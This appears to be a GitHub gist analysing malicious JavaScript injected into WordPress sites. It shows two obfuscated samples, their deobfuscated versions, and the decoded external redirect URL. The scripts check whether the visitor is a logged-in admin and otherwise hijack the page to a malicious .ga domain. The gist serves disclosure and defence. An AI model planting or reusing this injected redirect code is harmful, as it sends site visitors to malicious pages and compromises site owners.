wp-admin/user-new.php malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Malicious JS | |
| var _0x23e9=['fromCharCode','href','protocol','_wpnonce_create-user','hostname','2393Pryhqw','open','/wp-admin/user-new.php','responseText','409897xshIay','location','169513QzOUxL','50FowjZA','wp-login','9859XsvnsI','781107ACONqL','971499IySred','replace','137OAkHgN','19aiEBJJ','send','indexOf','stop','146NrndrR','8530CekIlp','match'];var _0x12b5=function(_0x4550ff,_0x13cb05){_0x4550ff=_0x4550ff-0x75;var _0x23e9f6=_0x23e9[_0x4550ff];return _0x23e9f6;};var _0x47a6be=_0x12b5;(function(_0x40233a,_0x370641){var _0x58b599=_0x12b5;while(!![]){try{var _0x59ca3d=-parseInt(_0x58b599(0x7e))*parseInt(_0x58b599(0x76))+-parseInt(_0x58b599(0x87))*parseInt(_0x58b599(0x85))+parseInt(_0x58b599(0x88))+-parseInt(_0x58b599(0x82))+-parseInt(_0x58b599(0x89))+parseInt(_0x58b599(0x77))*-parseInt(_0x58b599(0x8b))+-parseInt(_0x58b599(0x8c))*-parseInt(_0x58b599(0x84));if(_0x59ca3d===_0x370641)break;else _0x40233a['push'](_0x40233a['shift']());}catch(_0x2b4363){_0x40233a['push'](_0x40233a['shift']());}}}(_0x23e9,0x94cf0));function checkme(){var _0xf7249d=_0x12b5,_0xcdc926=window[_0xf7249d(0x83)][_0xf7249d(0x7b)]+'//'+window[_0xf7249d(0x83)][_0xf7249d(0x7d)],_0x4b9617=httpGet(_0xcdc926+_0xf7249d(0x80)),_0x1824e4=/name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;if(_0x4b9617[_0xf7249d(0x8e)](_0xf7249d(0x7c))!==-0x1){var _0x2bd2b5=_0x1824e4['exec'](_0x4b9617);if(_0x2bd2b5[0x2][_0xf7249d(0x78)](/([a-z0-9]{10})/))return 0x1;}return 0x0;}if(checkme()==0x0){if(window[_0x47a6be(0x83)]['href'][_0x47a6be(0x8e)](_0x47a6be(0x86))>-0x1){}else{window[_0x47a6be(0x75)]();var lp=String[_0x47a6be(0x79)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x47a6be(0x83)][_0x47a6be(0x8a)](lp),document['location'][_0x47a6be(0x7a)]=lp;}}else{}function httpGet(_0x45b588){var _0x14042e=_0x47a6be,_0x2d0603=new XMLHttpRequest();return _0x2d0603[_0x14042e(0x7f)]('GET',_0x45b588,![]),_0x2d0603[_0x14042e(0x8d)](null),_0x2d0603[_0x14042e(0x81)];} | |
| var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return _0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];} | |
| 1. Decoded _0x23e9 | |
| 'use strict'; | |
| /** @type {!Array} */ | |
| var _0x23e9 = ["fromCharCode", "href", "protocol", "_wpnonce_create-user", "hostname", "2393Pryhqw", "open", "/wp-admin/user-new.php", "responseText", "409897xshIay", "location", "169513QzOUxL", "50FowjZA", "wp-login", "9859XsvnsI", "781107ACONqL", "971499IySred", "replace", "137OAkHgN", "19aiEBJJ", "send", "indexOf", "stop", "146NrndrR", "8530CekIlp", "match"]; | |
| /** | |
| * @param {number} totalExpectedResults | |
| * @param {?} entrySelector | |
| * @return {?} | |
| */ | |
| var _0x12b5 = function(totalExpectedResults, entrySelector) { | |
| /** @type {number} */ | |
| totalExpectedResults = totalExpectedResults - 117; | |
| var _0x23e9f6 = _0x23e9[totalExpectedResults]; | |
| return _0x23e9f6; | |
| }; | |
| /** @type {function(number, ?): ?} */ | |
| var _0x47a6be = _0x12b5; | |
| (function(PL$107, y) { | |
| /** @type {function(number, ?): ?} */ | |
| var toMonths = _0x12b5; | |
| for (; !![];) { | |
| try { | |
| /** @type {number} */ | |
| var swipingDirection = -parseInt(toMonths(126)) * parseInt(toMonths(118)) + -parseInt(toMonths(135)) * parseInt(toMonths(133)) + parseInt(toMonths(136)) + -parseInt(toMonths(130)) + -parseInt(toMonths(137)) + parseInt(toMonths(119)) * -parseInt(toMonths(139)) + -parseInt(toMonths(140)) * -parseInt(toMonths(132)); | |
| if (swipingDirection === y) { | |
| break; | |
| } else { | |
| PL$107["push"](PL$107["shift"]()); | |
| } | |
| } catch (_0x2b4363) { | |
| PL$107["push"](PL$107["shift"]()); | |
| } | |
| } | |
| })(_0x23e9, 609520); | |
| /** | |
| * @return {?} | |
| */ | |
| function checkme() { | |
| /** @type {function(number, ?): ?} */ | |
| var d3_vendorSymbol = _0x12b5; | |
| var _0xcdc926 = window[d3_vendorSymbol(131)][d3_vendorSymbol(123)] + "//" + window[d3_vendorSymbol(131)][d3_vendorSymbol(125)]; | |
| var n = httpGet(_0xcdc926 + d3_vendorSymbol(128)); | |
| /** @type {!RegExp} */ | |
| var dojo = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; | |
| if (n[d3_vendorSymbol(142)](d3_vendorSymbol(124)) !== -1) { | |
| var diffVector = dojo["exec"](n); | |
| if (diffVector[2][d3_vendorSymbol(120)](/([a-z0-9]{10})/)) { | |
| return 1; | |
| } | |
| } | |
| return 0; | |
| } | |
| if (checkme() == 0) { | |
| if (window[_0x47a6be(131)]["href"][_0x47a6be(142)](_0x47a6be(134)) > -1) { | |
| } else { | |
| window[_0x47a6be(117)](); | |
| var lp = String[_0x47a6be(121)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51); | |
| window[_0x47a6be(131)][_0x47a6be(138)](lp); | |
| document["location"][_0x47a6be(122)] = lp; | |
| } | |
| } else { | |
| } | |
| /** | |
| * @param {?} url | |
| * @return {?} | |
| */ | |
| function httpGet(url) { | |
| var convertObjectWithTemplates = _0x47a6be; | |
| /** @type {!XMLHttpRequest} */ | |
| var xhr = new XMLHttpRequest; | |
| return xhr[convertObjectWithTemplates(127)]("GET", url, ![]), xhr[convertObjectWithTemplates(141)](null), xhr[convertObjectWithTemplates(129)]; | |
| } | |
| ; | |
| 2. Decode _0x2825 | |
| var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return _0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];} | |
| 'use strict'; | |
| /** @type {!Array} */ | |
| var _0x2825 = ["3hDSBaH", "877436TcDUUT", "/wp-admin/user-new.php", "1533496ZfMzaT", "111413jVhcXt", "1iyZpOm", "href", "850953KfrjDB", "replace", "1328659gEXdcO", "location", "send", "open", "hostname", "1670551uThOzi", "_wpnonce_create-user", "responseText", "GET", "81125ZdnGmk", "indexOf", "stop", "fromCharCode"]; | |
| /** | |
| * @param {number} totalExpectedResults | |
| * @param {?} entrySelector | |
| * @return {?} | |
| */ | |
| var _0x56b8 = function(totalExpectedResults, entrySelector) { | |
| /** @type {number} */ | |
| totalExpectedResults = totalExpectedResults - 134; | |
| var _0x2825ba = _0x2825[totalExpectedResults]; | |
| return _0x2825ba; | |
| }; | |
| /** @type {function(number, ?): ?} */ | |
| var _0x3f0146 = _0x56b8; | |
| (function(PL$107, y) { | |
| /** @type {function(number, ?): ?} */ | |
| var toMonths = _0x56b8; | |
| for (; !![];) { | |
| try { | |
| /** @type {number} */ | |
| var swipingDirection = parseInt(toMonths(138)) + -parseInt(toMonths(136)) + parseInt(toMonths(153)) + -parseInt(toMonths(139)) * parseInt(toMonths(135)) + parseInt(toMonths(142)) + -parseInt(toMonths(149)) * parseInt(toMonths(140)) + parseInt(toMonths(144)); | |
| if (swipingDirection === y) { | |
| break; | |
| } else { | |
| PL$107["push"](PL$107["shift"]()); | |
| } | |
| } catch (_0x5d00d9) { | |
| PL$107["push"](PL$107["shift"]()); | |
| } | |
| } | |
| })(_0x2825, 912007); | |
| /** | |
| * @return {?} | |
| */ | |
| function checkme() { | |
| /** @type {function(number, ?): ?} */ | |
| var d3_vendorSymbol = _0x56b8; | |
| if (window[d3_vendorSymbol(145)][d3_vendorSymbol(141)][d3_vendorSymbol(154)]("wp-login") !== -1) { | |
| return 1; | |
| } | |
| var _0x51714c = window[d3_vendorSymbol(145)]["protocol"] + "//" + window[d3_vendorSymbol(145)][d3_vendorSymbol(148)]; | |
| var n = httpGet(_0x51714c + d3_vendorSymbol(137)); | |
| if (n[d3_vendorSymbol(154)](d3_vendorSymbol(150)) !== -1) { | |
| return 1; | |
| } | |
| return 0; | |
| } | |
| if (checkme() == 0) { | |
| window[_0x3f0146(155)](); | |
| var lp = String[_0x3f0146(134)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51); | |
| window[_0x3f0146(145)][_0x3f0146(143)](lp); | |
| document[_0x3f0146(145)][_0x3f0146(141)] = lp; | |
| } else { | |
| } | |
| /** | |
| * @param {?} url | |
| * @return {?} | |
| */ | |
| function httpGet(url) { | |
| var now = _0x3f0146; | |
| /** @type {!XMLHttpRequest} */ | |
| var rpm_traffic = new XMLHttpRequest; | |
| return rpm_traffic[now(147)](now(152), url, ![]), rpm_traffic[now(146)](null), rpm_traffic[now(151)]; | |
| } | |
| ; | |
| Malicious URLs encoded: | |
| https://blow.talkingaboutfirms.ga/?sid=54745-33-674347-21&cid=378345&pidi=654368&aid=27833 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment